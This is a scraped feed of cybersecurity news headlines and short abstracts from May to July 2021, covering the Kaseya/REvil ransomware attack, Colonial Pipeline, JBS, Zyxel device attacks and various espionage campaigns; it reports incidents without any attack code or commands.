REvil victims are refusing to pay after flawed Kaseya ransomware attack Full Text
Abstract
The REvil ransomware gang's attack on MSPs and their customers last week outwardly should have been successful, yet changes in their typical tactics and procedures have led to few ransom payments.BleepingComputer
July 8, 2021
Oil & Gas Targeted in Year-Long Cyber-Espionage Campaign Full Text
Abstract
A global effort to steal information from energy companies is using sophisticated social engineering to deliver Agent Tesla and other RATs.Threatpost
July 08, 2021
Experts Uncover Malware Attacks Targeting Corporate Networks in Latin America Full Text
Abstract
Cybersecurity researchers on Thursday took the wraps off a new, ongoing espionage campaign targeting corporate networks in Spanish-speaking countries, specifically Venezuela, to spy on its victims. Dubbed " Bandidos " by ESET owing to the use of an upgraded variant of Bandook malware, the primary targets of the threat actor are corporate networks in the South American country spanning across manufacturing, construction, healthcare, software services, and retail sectors. Written in both Delphi and C++, Bandook has a history of being sold as a commercial remote access trojan (RAT) dating all the way back to 2005. Since then, numerous variants have emerged on the threat landscape and put to use in different surveillance campaigns in 2015 and 2017, allegedly by a cyber-mercenary group known as Dark Caracal on behalf of government interests in Kazakhstan and Lebanon. In a continuing resurgence of the Bandook Trojan, Check Point last year disclosed three new samples — oneThe Hacker News
July 8, 2021
‘Apex predators’: Why the Kaseya ransomware attack has experts worried Full Text
Abstract
The REvil gang used a level of planning and sophistication closer to high-level, government-backed hackers, rather than a mere criminal operation, several cybersecurity experts say.NBC News
July 8, 2021
India: SBI Customers Being Targeted by an OTP Scam Full Text
Abstract
The research wing of New Delhi-based think tank CyberPeace Foundation, along with Autobot Infosec Pvt Ltd, studied two such incidents on the name of SBI that were faced by some smartphone users.The Times Of India
July 7, 2021
Wiregrass Electric Cooperative hit by a ransomware attack Full Text
Abstract
Wiregrass Electric Cooperative, a rural Alabama electric cooperative was hit by a ransomware attack. Wiregrass Electric Cooperative, a rural Alabama electric cooperative that serves about 25,000 members, was hit by a ransomware attack. The cyberattack...Security Affairs
July 7, 2021
Phishing campaign looks to leverage Kaseya VSA fears Full Text
Abstract
A phishing campaign is taking advantage of Kaseya VSA customers eagerly awaiting a patch for the beleaguered remote monitoring and management application.SCMagazine
July 7, 2021
Kaseya Ransomware Attack Used to Fuel Malspam Campaign Full Text
Abstract
In a series of tweets from Malwarebytes, researchers have disclosed that a malspam campaign is taking advantage of the Kaseya ransomware attack to drop Cobalt Strike.Cyware Alerts - Hacker News
July 07, 2021
Tens of thousands scammed using fake Android cryptomining apps Full Text
Abstract
Scammers tricked at least 93,000 people into buying fake Android cryptocurrency mining applications, as revealed by researchers from California-based cybersecurity firm Lookout.BleepingComputer
July 6, 2021
Attackers Accelerating Ransomware Attacks on ICS Networks Full Text
Abstract
Ransomware attacks are evolving rapidly to target ICS endpoints worldwide with a significant rise in activity during the past year. Four ransomware families, namely Ryuk, Nefilm, Revil, and LockBit, account for over half of these attacks, a new Trend Micro report says.Cyware Alerts - Hacker News
July 6, 2021
WEC: No data compromised in ransomware attack Full Text
Abstract
While a ransomware attack was launched against the Alabama-based Wiregrass Electric Cooperative during the weekend, officials have verified that no data have been compromised.WTVY
July 6, 2021
Healthcare Ransomware Attack Impacts Practice Management Software Vendor PracticeFirst Full Text
Abstract
Apart from PII, diagnoses, lab and treatment information, health insurance details, employee usernames and passwords, bank account information, and tax identification numbers were exposed.HealthITSecurity
July 06, 2021
Kaseya: Roughly 1,500 businesses hit by REvil ransomware attack Full Text
Abstract
Kaseya says the REvil supply-chain ransomware attack breached the systems of roughly 60 of its direct customers using the company's VSA on-premises product.BleepingComputer
July 06, 2021
Kaseya Rules Out Supply-Chain Attack; Says VSA 0-Day Hit Its Customers Directly Full Text
Abstract
U.S. technology firm Kaseya, which is firefighting the largest ever supply-chain ransomware strike on its VSA on-premises product, ruled out the possibility that its codebase was unauthorizedly tampered with to distribute malware. While initial reports raised speculations that the ransomware gang might have gained access to Kaseya's backend infrastructure and abused it to deploy a malicious update to VSA servers running on client premises, in a modus operandi similar to that of the devastating SolarWinds hack, it has since emerged that a never-before-seen security vulnerability ( CVE-2021-30116 ) in the software was leveraged to push ransomware to Kaseya's customers. "The attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution," the Miami-headquartered company noted in the incident analysis. "This allowed the attackers to leverage the standard VSA product functionality to deplThe Hacker News
July 6, 2021
Kaseya Counts Up to 1,500 Businesses Affected by Ransomware Attack Full Text
Abstract
Between 800 and 1,500 businesses around the world have been affected by a ransomware attack centered on U.S. information technology firm Kaseya, its chief executive said on Monday.Reuters
July 5, 2021
The Kaseya Ransomware Attack is a Really Big Deal Full Text
Abstract
If you’re not already paying attention to the Kaseya ransomware incident, you should be.Lawfare
July 5, 2021
Kaseya Attack Fallout: CISA, FBI Offer Guidance Full Text
Abstract
Following a brazen ransomware attack by the REvil cybergang, CISA and FBI offer guidance to victims.Threatpost
July 5, 2021
Kubernetes Clusters Exploited to Perform Brute Force Attacks Full Text
Abstract
U.S. and U.K cybersecurity agencies jointly published an alert on a series of large-scale brute-force attacks sponsored by the Russia-linked APT28 group. Users are recommended to change all default credentials and use appropriate network segmentation, restrictions, and automated tools for auditing ... Read MoreCyware Alerts - Hacker News
July 5, 2021
REvil’s New Supply Chain Attack Takes Down 1,000s of Businesses Full Text
Abstract
A ransomware attack by REvil group paralyzed the networks of thousands of companies from the U.S. to Sweden. Hackers exploited Kaseya's systems management platform called VSA. The gang has allegedly demanded millions in ransom to restore the data. Organizations are suggested to implement adequ ... Read MoreCyware Alerts - Hacker News
July 5, 2021
US water company WSSC Water hit by a ransomware attack Full Text
Abstract
US water company WSSC Water is investigating a ransomware attack that affected non-essential business systems in May. WSSC Water is investigating a ransomware attack that took place on May 24 and that targeted a portion of their network that operates...Security Affairs
July 04, 2021
Kaseya was fixing zero-day just as REvil ransomware sprung their attack Full Text
Abstract
The zero-day vulnerability used to breach on-premise Kaseya VSA servers was in the process of being fixed, just as the REvil ransomware gang used it to perform their massive Friday attack.BleepingComputer
July 3, 2021
‘Turn off your heart’: Kaseya VSA ransomware hits MSPs in a vital organ Full Text
Abstract
The flurry of ramsomware attacks starting Friday, targeting on-premises Kaseya VSA applications, are particularly frightening to managed service providers, because they strike at software at the center of the enterprise: the remote monitoring and management (RMM) platform.SCMagazine
July 3, 2021
Kaseya VSA supply-chain ransomware attack hit hundreds of companies Full Text
Abstract
A supply attack by REvil ransomware operators against Kaseya VSA impacted multiple managed service providers (MSPs) and their clients. A new supply chain attack made the headlines, this afternoon, the REvil ransomware gang hit the cloud-based MSP platform...Security Affairs
July 03, 2021
Kaseya Supply-Chain Attack Hits Nearly 40 Service Providers With REvil Ransomware Full Text
Abstract
The threat actors behind the REvil ransomware gang appear to have pushed ransomware via an update for Kaseya's IT management software, hitting around 40 customers worldwide, in what's an instance of a widespread supply-chain ransomware attack. "Beginning around mid-day (EST/US) on Friday, July 2, 2021, Kaseya's Incident Response team learned of a potential security incident involving our VSA software," the company's CEO Fred Voccola said in a statement shared late Friday. Following the incident, the IT and security management services company said it took immediate steps to shut down our SaaS servers as a precautionary measure, in addition to notifying its on-premises customers to shut down their VSA servers to prevent them from being compromised. Voccola also said the company has identified the source of the vulnerability and that it's readying a patch to mitigate the ongoing issues. In the interim, the company also noted it intends to keep all onThe Hacker News
July 02, 2021
Ransomware attack hits software manager, affecting 200 companies Full Text
Abstract
A Miami-based IT software management company announced Friday that a ransomware attack may have targeted one of its tools used by its clients, potentially affecting some 200 businesses.The Hill
July 02, 2021
REvil ransomware hits 200 companies in MSP supply-chain attack Full Text
Abstract
A massive REvil ransomware attack affects multiple managed service providers and their clients through a reported Kaseya supply-chain attack.BleepingComputer
July 2, 2021
Experts warn of Babuk Locker attacks with recently leaked ransomware builder Full Text
Abstract
The recently leaked Babuk Locker ransomware builder was used by a threat actor in an ongoing campaign targeting victims worldwide. At the end of June, The Record first reported that the builder for the Babuk Locker ransomware was leaked online allowing...Security Affairs
July 1, 2021
Dropbox Used to Mask Malware Movement in Cyberespionage Campaign Full Text
Abstract
The IndigoZebra APT is targeting the Afghan government using Dropbox as an API that leaves no traces of communications with weirdo websites.Threatpost
June 30, 2021
Hackers hit a televised phone-in between President Putin and citizens at a TV show Full Text
Abstract
A massive cyber attack attempted to disrupt a televised phone-in between Russian President Vladimir Putin and the Rossiya 24 network. Hackers launched a massive cyberattack against the state-broadcast Rossiya 24 network while transmitting a show in which...Security Affairs
June 30, 2021
Indexsinas SMB Worm Campaign Infests Whole Enterprises Full Text
Abstract
The self-propagating malware’s attack chain is complex, using former NSA cyberweapons, and ultimately drops cryptominers on targeted machines.Threatpost
June 30, 2021
University Medical Center reports suspicious activity, possible cyberattack Full Text
Abstract
UMC's found suspicious activity on its computer network in mid-June. UMC quickly restricted external access to servers and it continues to work with law enforcement to fully investigate the activity.KTNV
June 30, 2021
The “WayBack” Campaign: a Large Scale Operation Hiding in Plain Sight Full Text
Abstract
The campaign was designed to deliver over 900 pieces of malware with highly dangerous capabilities, enabling the threat actor to conduct both digital and environmental monitoring of their victims.Yoroi
June 29, 2021
Threat Actors are Targeting Firewall and VPN Devices Full Text
Abstract
Networking equipment vendor Zyxel has emailed customers to alert them about a cyberattack targeting its high-end enterprise-focused firewall and VPN server products. Attacks against firewalls, VPN servers, and load balancers have become common. Such attacks are becoming prominent and being carried ... Read MoreCyware Alerts - Hacker News
June 28, 2021
Nefilim Ransomware Attack Through a MITRE Att&ck Lens Full Text
Abstract
It is operated by a group tracked under the intrusion set "Water Roc". This group combines advanced techniques with legitimate tools to make them harder to detect and respond before it is too late.Trend Micro
June 25, 2021
Attacks against game companies are up. But why? Full Text
Abstract
Malicious hackers are increasingly mobbing the video game industry, but security experts can’t pinpoint a single explanation for the surge.SCMagazine
June 25, 2021
A New Attack on AI-driven Facial Recognition Systems Full Text
Abstract
Researchers developed an attack technique named Adversarial Octopus that could perform a targeted attack on AI-based facial recognition systems. This attack shows that AI systems require much more attention at the security front, and such new attack methods will help raise awareness.Cyware Alerts - Hacker News
June 25, 2021
Watch Out! Zyxel Firewalls and VPNs Under Active Cyberattack Full Text
Abstract
Taiwanese networking equipment company Zyxel is warning customers of an ongoing attack targeting a "small subset" of its security products such as firewall and VPN servers. Attributing the attacks to a "sophisticated threat actor," the firm noted that the attacks single out appliances that have remote management or SSL VPN enabled, namely in the USG/ZyWALL, USG FLEX, ATP, and VPN series running on-premise ZLD firmware, implying that the targeted devices are publicly accessible over the internet. "The threat actor attempts to access a device through WAN; if successful, they then bypass authentication and establish SSL VPN tunnels with unknown user accounts, such as 'zyxel_slIvpn', 'zyxel_ts', or 'zyxel_vpn_test', to manipulate the device's configuration," Zyxel said in an email message , which was shared on Twitter. As of writing, it's not immediately known if the attacks are exploiting previously known vulnerabilitiesThe Hacker News
June 24, 2021
Oh FCUK! Fashion Label, Medical Diagnostics Firm Latest REvil Victims Full Text
Abstract
The infamous ransomware group hit two big-name companies within hours of each other.Threatpost
June 24, 2021
Zyxel says a threat actor is targeting its enterprise firewall and VPN devices Full Text
Abstract
Zyxel has emailed customers this week to alert them about a series of attacks that have been targeting some of the company’s high-end enterprise-focused firewall and VPN server products.The Record
June 24, 2021
Zyxel warns customers of attacks on its enterprise firewall and VPN devices Full Text
Abstract
Networking equipment giant Zyxel warns customers of a series of attacks that have been targeting some of its enterprise firewall and VPN devices. Networking equipment vendor Zyxel warned its customers of a series of attacks that have been targeting...Security Affairs
June 24, 2021
Cyberattack at IT Service Provider InfoSolutions Impacts Swedish COVID-19 Testing Lab Full Text
Abstract
Even though the motive behind the breach is not clear, local media reports that it is suspected to be a warning shot from hackers as the little noticeable damage has yet to come out from the breach.Cyber News
June 23, 2021
Healthcare giant Grupo Fleury hit by REvil ransomware attack Full Text
Abstract
Brazilian medical diagnostic company Grupo Fleury has suffered a ransomware attack that has disrupted business operations after the company took its systems offline.BleepingComputer
June 23, 2021
Healthcare giant Grupo Fleury hit by alleged REvil ransomware attack Full Text
Abstract
Brazilian medical diagnostic company Grupo Fleury has suffered a ransomware attack that has disrupted business operations after the company took its systems offline.BleepingComputer
June 23, 2021
Ireland: Three quarters of HSE IT servers decrypted following crippling cyberattack Full Text
Abstract
At least 75% of the HSE’s IT servers have been decrypted and 70% of the health service’s computer devices have been restored to use following a cyber attack nearly six weeks ago.The Journal
June 22, 2021
Lawsuits filed against Scripps Health following ransomware attack, data theft Full Text
Abstract
Noteworthy is that Scripps maintained open transparency and communication for each step of recovery after a ransomware attack exposed protected health information of 150,000 patients – a decision that is actually not required under HIPPA.SCMagazine
June 22, 2021
ADVERSARIAL OCTOPUS – ATTACK DEMO FOR AI-DRIVEN FACIAL RECOGNITION ENGINE Full Text
Abstract
Researchers from Adversa devised an attack technique, dubbed ADVERSARIAL OCTOPUS, against Facial Recognition systems. THE INTENTION BEHIND THIS PROJECT Driven by our mission to increase trust in AI, Adversa’s AI Red Team is constantly exploring...Security Affairs
June 22, 2021
A ransomware attack disrupted the IT network of the City of Liege Full Text
Abstract
Belgium city of Liege has suffered today a ransomware attack that has disrupted the IT network of the municipality and its online services. Liege, one of the biggest cities in Belgium, was hit by a ransomware attack that has disrupted the IT network...Security Affairs
June 22, 2021
Cyberattack on Polish government officials linked to Russian hackers Full Text
Abstract
A recent string of cyberattacks targeted at thousands of Polish email users, including government officials, have been linked by the Polish intelligence services to a Russian hacking group.The Hill
June 21, 2021
Water Sector Security Report Released Just as Another Water Plant Hack Comes to Light Full Text
Abstract
The organization in April surveyed 606 individuals working at water and wastewater utilities in the U.S. to get a better understanding of the sector in terms of cybersecurity.Security Week
June 21, 2021
Threat actors in January attempted to poison the water at a US facility Full Text
Abstract
Threat actors in January attempted to poison the water at a US facility, a circumstance that highlights the importance of cybersecurity for water and wastewater utilities. The news that a threat actor in January attempted to poison the water at a facility...Security Affairs
June 20, 2021
Poland: The leader of the PiS party blames Russia for the recent attack Full Text
Abstract
Jaroslaw Kaczynski, the leader of the Poland Law and Justice party, blames Russia for the recent cyberattack targeting top Polish politicians. Jaroslaw Kaczynski, the leader of the Poland Law and Justice party (PiS), blames Russia for the recent...Security Affairs
June 19, 2021
Cyber attack on Polish officials came from Russia, Kaczynski says Full Text
Abstract
Top Polish government officials have been hit by a far-reaching cyber attack conducted from Russian territory, Poland's de facto leader Jaroslaw Kaczynski said on Friday in his first official statement on an email hacking incident this month.Reuters
June 18, 2021
Freeport town computer network back up following ransomware attack Full Text
Abstract
The town’s municipal computer network is back up and running after a cyberattack one week ago that has been linked to Russian criminals and a global ransomware group, the town manager said Tuesday.Press Herald
June 17, 2021
Geek Squad Vishing Attack Bypasses Email Security to Hit 25K Mailboxes Full Text
Abstract
An email campaign asking victims to call a bogus number to suspend supposedly fraudulent subscriptions got right past Microsoft’s native email controls.Threatpost
June 17, 2021
Ryuk ransomware recovery cost us $8.1m and counting, says Baltimore school authority Full Text
Abstract
An organisation whose network was infected by Ryuk ransomware has spent $8.1m over seven months recovering from it – and that’s still not the end of it, according to US news reports.The Register
June 17, 2021
UK’s Gateley Says Cyberattack Affects Small Portion of Its Data Full Text
Abstract
The commercial legal services firm said it had informed relevant regulators and law enforcement agencies along with the country's Information Commissioner's office about the breach.US News
June 16, 2021
Poland institutions and individuals targeted by an unprecedented series of cyber attacks Full Text
Abstract
Poland 's government announced that it was targeted by an 'Unprecedented' series of cyber attacks, hackers hit against institutions and individuals. Poland's parliament had a closed-door session to discuss an unprecedented wave of cyber attacks that...Security Affairs
June 16, 2021
New threat intel framework takes aim at bot-fueled business logic attacks Full Text
Abstract
BLADE addresses scenarios in which bots exploit apps and websites – using them as they were intended, but for malicious purposes like credential stuffing and account takeovers.SCMagazine
June 16, 2021
Health care ransomware attacks: Oklahoma health system driven to EHR downtime Full Text
Abstract
The incident is the latest in what appears to be another ransomware wave, after a previous onslaught of attacks and EHR outages in the fall of 2020.SCMagazine
June 16, 2021
Malware Attack on South Korean Entities Was Work of Andariel Group Full Text
Abstract
A malware campaign targeting South Korean entities that came to light earlier this year has been attributed to a North Korean nation-state hacking group called Andariel, once again indicating that Lazarus attackers are following the trends and their arsenal is in constant development . "The way Windows commands and their options were used in this campaign is almost identical to previous Andariel activity," Russian cybersecurity firm Kaspersky said in a deep-dive published Tuesday. Victims of the attack are in the manufacturing, home network service, media, and construction sectors. Designated as part of the Lazarus constellation, Andariel is known for unleashing attacks on South Korean organizations and businesses using specifically tailored methods created for maximum effectivity. In September 2019, the sub-group, along with Lazarus and Bluenoroff, was sanctioned by the U.S. Treasury Department for their malicious cyber activity on critical infrastructure. AndaThe Hacker News
June 15, 2021
Fujifilm restores operations after recent ransomware attack Full Text
Abstract
Japanese multinational conglomerate Fujifilm announced that it has restored operations following the recent ransomware attack. On June 4, the Japanese multinational conglomerate Fujifilm announced that it was hit by a ransomware attack and shut down...Security Affairs
June 15, 2021
Verizon, water agency targeted in Chinese cyber espionage campaign: report Full Text
Abstract
Verizon and one of the country’s largest water agencies were reportedly included among the groups targeted in the hacking of Pulse Connect Secure devices, a hack blamed on China that came to light in April.The Hill
June 15, 2021
No Two REvil Attacks Are the Same, Experts Warn Full Text
Abstract
The ransomware affiliate model drives a challenging variety of threats for defenders to tackleInfosecurity Magazine
June 14, 2021
REvil ransomware hits US nuclear weapons contractor Full Text
Abstract
US nuclear weapons contractor Sol Oriens has suffered a cyberattack allegedly at the hands of the REvil ransomware gang, which claims to be auctioning data stolen during the attack.BleepingComputer
June 14, 2021
NoxPlayer Supply-Chain Attack is Likely the Work of Gelsemium Hackers Full Text
Abstract
A new cyber espionage group named Gelsemium has been linked to a supply chain attack targeting the NoxPlayer Android emulator that was disclosed earlier this year. The findings come from a systematic analysis of multiple campaigns undertaken by the APT crew, with evidence of the earliest attack dating back all the way to 2014 under the codename Operation TooHash based on malware payloads deployed in those intrusions. "Victims of these campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities," cybersecurity firm ESET said in an analysis published last week. "Gelsemium's whole chain might appear simple at first sight, but the exhaustive configurations, implanted at each stage, modify on-the-fly settings for the final payload, making it harder to understand." Targeted countries include China, Mongolia, North and South Korea, Japan, Turkey, Iran, Iraq, SaudiThe Hacker News
June 14, 2021
REvil Claims Responsibility for Invenergy Hack Full Text
Abstract
Ransomware group that attacked JBS says it also hacked Chicago-based clean energy companyInfosecurity Magazine
June 14, 2021
Fujifilm resumes normal operations after ransomware attack Full Text
Abstract
Japanese multinational conglomerate Fujifilm says that it has resumed normal business and customer operations following a ransomware attack that forced it to shut the entire network on June 4.BleepingComputer
June 12, 2021
Details Emerge on How Gaming Giant EA Was Hacked Full Text
Abstract
The group stole the source code for FIFA 21 and related tools that match players with other players, as well as the source code for the Frostbite engine that powers games like Battlefield and other internal game development tools.Dark Reading
June 12, 2021
Ransomware attack hit Teamsters in 2019 — but they refused to pay Full Text
Abstract
Unlike many of the companies hit by high-profile ransomware attacks in recent months, the union declined to pay, despite the FBI's advice to do so, three sources familiar with the previously unreported cyberattack told NBC News.NBC News
June 11, 2021
Motives for ransomware attack against nuclear contractor Sol Oriens remain unclear Full Text
Abstract
Sol Oriens’ work around nuclear weapons raises concerns about the implications of a ransomware attack, though most experts still believe the motivations are financial.SCMagazine
June 11, 2021
Teamsters refused to pay a ransomware attack in 2019 Full Text
Abstract
The Teamsters labor union was hit with a ransomware attack in 2019 but refused to pay the seven-figure payment demanded by hackers, despite being advised by the FBI to do so, a Teamsters spokesperson confirmed to The Hill.The Hill
June 11, 2021
Monumental Supply-Chain Attack on Airlines Traced to State Actor Full Text
Abstract
Airlines are warned to scour networks for traces of the campaign, likely the work of APT41, lurking in networks.Threatpost
June 11, 2021
Gelsemium Group Linked to NoxPlayer Supply-Chain Attack Full Text
Abstract
Experts took the wraps off of activities of Gelsemium APT, which uses state-of-the-art supply chain attack techniques against targets, including electronics manufacturers, in East Asia and the Middle East. Its attack strategy indicates that the group is predetermined about its targets and cou ... Read MoreCyware Alerts - Hacker News
June 11, 2021
REvil Hits US Nuclear Weapons Contractor: Report Full Text
Abstract
“We hereby keep a right (sic) to forward all of the relevant documentation and data to military agencies of our choise (sic)” REvil reportedly wrote.Threatpost
June 11, 2021
Diving Into the Roots of the Relentless Ransomware Catastrophe Full Text
Abstract
The REvil ransomware gang recently attacked JBS, the world’s largest meat processing company. The attack forced the company to shut down its Australian and North American IT systems.Cyware Alerts - Hacker News
June 11, 2021
Al Jazeera detected and blocked disruptive cyberattacks Full Text
Abstract
Qatari government-funded international Arabic news channel Al Jazeera announced to have blocked a series of disruptive cyberattacks aimed at its news publishing platform. Qatari government-funded international Arabic news channel Al Jazeera announced...Security Affairs
June 10, 2021
Foodservice supplier Edward Don hit by a ransomware attack Full Text
Abstract
Foodservice supplier Edward Don has suffered a ransomware attack that has caused the company to shut down portions of the network to prevent the attack's spread.BleepingComputer
June 10, 2021
‘Nameless’ malware attacks 1.2TB database in the cloud Full Text
Abstract
The virus escaped with 6 million files that it grabbed from desktop and downloads folders. Screenshots made by the malware revealed that it spread via illegal Adobe PhotoShop software, Windows cracking tools, and pirated games.SCMagazine
June 09, 2021
New TLS Attack Lets Attackers Launch Cross-Protocol Attacks Against Secure Sites Full Text
Abstract
Researchers have disclosed a new type of attack that exploits misconfigurations in transport layer security (TLS) servers to redirect HTTPS traffic from a victim's web browser to a different TLS service endpoint located on another IP address to steal sensitive information. The attacks have been dubbed ALPACA , short for "Application Layer Protocol Confusion - Analyzing and mitigating Cracks in tls Authentication," by a group of academics from Ruhr University Bochum, Münster University of Applied Sciences, and Paderborn University. "Attackers can redirect traffic from one subdomain to another, resulting in a valid TLS session," the study said. "This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer." TLS is a cryptographic protocol underpinning several application layer protocols like HTTPS, SMTP, IMAP, POP3, and FTP to secure comThe Hacker News
June 09, 2021
Crypto-Mining Attacks Targeting Kubernetes Clusters via Kubeflow Instances Full Text
Abstract
Cybersecurity researchers on Tuesday disclosed a new large-scale campaign targeting Kubeflow deployments to run malicious cryptocurrency mining containers. The campaign involved deploying TensorFlow pods on Kubernetes clusters, with the pods running legitimate TensorFlow images from the official Docker Hub account. However, the container images were configured to execute rogue commands that mine cryptocurrencies. Microsoft said the deployments witnessed an uptick towards the end of May. Kubeflow is an open-source machine learning platform designed to deploy machine learning workflows on Kubernetes , an orchestration service used for managing and scaling containerized workloads across a cluster of machines. The deployment, in itself, was achieved by taking advantage of Kubeflow, which exposes its UI functionality via a dashboard that is deployed in the cluster. In the attack observed by Microsoft, the adversaries used the centralized dashboard as an ingress point to create aThe Hacker News
June 9, 2021
Hackers hit Spain’s Ministry of Labor and Social Economy Full Text
Abstract
The Spanish Ministry of Labor and Social Economy (MITES) was hit by a cyberattack and is working to restore impacted services. Spain's Ministry of Labor and Social Economy (MITES) was hit by a cyberattack on Wednesday and is working to restore impacted...Security Affairs
June 09, 2021
Spain’s Ministry of Labor and Social Economy hit by cyberattack Full Text
Abstract
The Spanish Ministry of Labor and Social Economy (MITES) is working on restoring services after being hit by a cyberattack on Wednesday.BleepingComputer
June 9, 2021
Memory and Storage Manufacturer ADATA Struck by Ragnar Locker Ransomware Attack Full Text
Abstract
Leading Taiwan-based memory and storage manufacturer ADATA was forced to take its systems offline after it was targeted by a ransomware attack in late May, the company has admitted.Tech Radar
June 9, 2021
Security researcher says attacks on Russian government have Chinese fingerprints – and typos, too Full Text
Abstract
An advanced persistent threat that Russia found inside government systems was too crude to have been the work of a Western nation, says security researcher Juan Andrés Guerrero-Saade.The Register
June 8, 2021
Cyber-attack on NYC Law Department Full Text
Abstract
FBI is investigating unauthorized access into New York City Law Department’s IT systemInfosecurity Magazine
June 8, 2021
Illinois County Stricken with Grief Full Text
Abstract
Grief ransomware gang claims to have stolen 2.5GB of personal data from St. ClairInfosecurity Magazine
June 8, 2021
Military Vehicles Maker Navistar Reports Data-Theft Cyberattack Full Text
Abstract
In a Form 8-K filing with the Securities and Exchange Commission (SEC), Navistar said it learned of a credible potential cybersecurity threat to its information technology system on May 20, 2021.Security Week
June 07, 2021
US recovers most of Colonial Pipeline’s $4.4M ransomware payment Full Text
Abstract
The US Department of Justice has recovered the majority of the $4.4 million ransom payment paid by Colonial Pipeline to the DarkSide ransomware operation.BleepingComputer
June 7, 2021
California City Hid Cyber-attack Full Text
Abstract
Azusa kept quiet about ransomware attack that netted cyber-criminals $65KInfosecurity Magazine
June 7, 2021
Colonial Pipeline Incident Sparks ‘Help Desk’ Phishing Attacks Full Text
Abstract
Cyberattackers are now using the notoriety of the Colonial Pipeline ransomware attack to wage further phishing campagnsInfosecurity Magazine
June 5, 2021
German cooperative banks hit by DDoS hack attack on IT provider Full Text
Abstract
A German company that operates technology for the nation’s cooperative banks said on Friday that a cyber attack disrupting more than 800 financial institutions appeared to be easing.Reuters
June 03, 2021
UF Health Florida hospitals back to pen and paper after cyberattack Full Text
Abstract
UF Health Central Florida has suffered a reported ransomware attack that forced two hospitals to shut down portions of their IT network.BleepingComputer
June 3, 2021
Museum Website Vandalized with X-Rated Ads Full Text
Abstract
Cyber-criminals take over Scottish tourism site and flood it with pornographic adwareInfosecurity Magazine
June 3, 2021
Half-Double - A New Variant of Rowhammer Attack Full Text
Abstract
Google researchers detail Half-Double, another Rowhammer attack technique, that could help criminals bypass current defenses and steal or manipulate data stored in memory. This recent study on the new Rowhammer bug variant is expected to help both researchers and industry partners to work toge ... Read MoreCyware Alerts - Hacker News
June 03, 2021
Chinese threat actors hacked NYC MTA using Pulse Secure zero-day Full Text
Abstract
Chinese-backed threat actors breached New York City's Metropolitan Transportation Authority (MTA) network in April using a Pulse Secure zero-day. Still, they failed to cause any data loss or gain access to systems controlling the transportation fleet.BleepingComputer
June 03, 2021
Massachusetts’ largest ferry service hit by ransomware attack Full Text
Abstract
The Steamship Authority, Massachusetts' largest ferry service, was hit by a ransomware attack that led to ticketing and reservation disruptions.BleepingComputer
June 2, 2021
Massachusetts Steamship Authority hit by ransomware attack Full Text
Abstract
The Steamship Authority said a team of IT professionals was assessing the impact of the attack. "Additional information will be provided upon completion of the initial assessment," the company said.WCVB
June 01, 2021
All JBS beef plants in US forced to halt production after cyberattack Full Text
Abstract
All JBS beef plants in the U.S. were forced to shut down production following a cyberattack on the meat producer over the weekend, a union representing workers at the facilities said Tuesday.The Hill
June 01, 2021
US: World’s largest beef producer JBS was hit by ransomware Full Text
Abstract
White House has confirmed today that JBS, the world's largest beef producer, was hit by a ransomware attack over the weekend coordinated by a group likely from Russia.BleepingComputer
June 01, 2021
Major meat producer JBS USA hit by cyberattack Full Text
Abstract
One of the largest meat suppliers in the country was hit on Sunday by a cyberattack that impacted operations, with the attack coming just weeks after Colonial Pipeline was forced to temporarily shut down operations due to a similar attack.The Hill
May 31, 2021
Swedish Health Agency discloses hacking attempts Full Text
Abstract
The Swedish Public Health Agency has shut down the country's infectious diseases database, SmiNet, last week after multiple hacking attempts. The Swedish Public Health Agency was forced to shut down its infectious diseases database, named SmiNet,...Security Affairs
May 31, 2021
Swedish Health Agency shuts down SmiNet after hacking attempts Full Text
Abstract
The Swedish Public Health Agency has shut down SmiNet, the country's infectious diseases database, on Thursday after it was targeted in several hacking attempts.BleepingComputer
May 31, 2021
How Ransomware Adversaries Reacted to the DarkSide Attack Full Text
Abstract
CrowdStrike researchers attributes the operation of the DarkSide RaaS to CARBON SPIDER, and is a skilled eCrime (ECX) group, highly likely Eastern Europe- or Russia-based.Crowdstrike
May 31, 2021
DeepSloth: An Adversarial Attack on Machine Learning Systems Full Text
Abstract
Scientists working at the University of Maryland developed a new adversarial attack that can force machine learning systems to slow down and cause critical failures. Although this technique is not yet harmful, more such devastating slowdown attacks can be discovered in the future.Cyware Alerts - Hacker News
May 30, 2021
These 2 attacks allow to alter certified PDF Documents Full Text
Abstract
Researchers disclosed two new attack techniques that allow modifying visible content on certified PDF documents without invalidating the digital signature. Researchers from Ruhr-University Bochum have disclosed two new attack techniques, dubbed Evil...Security Affairs
May 28, 2021
Myths versus reality: Three takeaways from the Colonial Pipeline attack Full Text
Abstract
Some saw Colonial Pipeline as a typical ransomware attack, albeit on a vulnerable target. Others saw this as reflective of weaknesses in the security posture of the nation’s critical infrastructure. And others felt the incident showcased inadequacies in the existing framework for public-private partnership. Here we offer a rundown of some notable characteristics and outcomes.SCMagazine
May 28, 2021
SolarWinds attackers leveraged trust in Constant Contact email marketing, USAID, to launch campaign Full Text
Abstract
Using a hijacked Constant Contact email marketing account of USAID, the adversaries sent phishing emails to roughly 3,000 accounts at more than 150 different organizations. About 25 percent of these targets were international development, humanitarian and human rights organizations.SCMagazine
May 28, 2021
Canada Post disclosed a ransomware attack on a third-party service provider Full Text
Abstract
Canada Post disclosed a ransomware attack on a third-party service provider that exposed shipping information for their customers. Canada Post announced that a ransomware attack on a third-party service provider exposed shipping information for their...Security Affairs
May 27, 2021
Is the attack on Fujitsu’s ProjectWEB SaaS platform the next big supply chain attack? Full Text
Abstract
While it’s still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as as a nation-state attack not unlike the one that targeted the SolarWinds supply chain.SCMagazine
May 27, 2021
New BazaFlix attack pushes BazarLoader malware via fake movie site Full Text
Abstract
Security researchers found a new BazarCall email phishing campaign that manages to bypass automated threat detection systems to deliver the BazarLoader malware used by the TrickBot gang.BleepingComputer
May 27, 2021
QNAP Devices Bombarded by Cyberattacks Full Text
Abstract
Attacks on Taiwan-based QNAP continue to turn ugly. It is now advising its clients to update the HBS 3 disaster recovery app to block Qlocker ransomware actors who now use a backdoor that exploits a hard-coded credentials vulnerability.Cyware Alerts - Hacker News
May 27, 2021
How Florida water attack investigators avoided an embarrassing misattribution Full Text
Abstract
Dragos limited initial disclosure to only relevant parties, after discovering a watering-hole malware attack that later turned out to be unrelated.SCMagazine
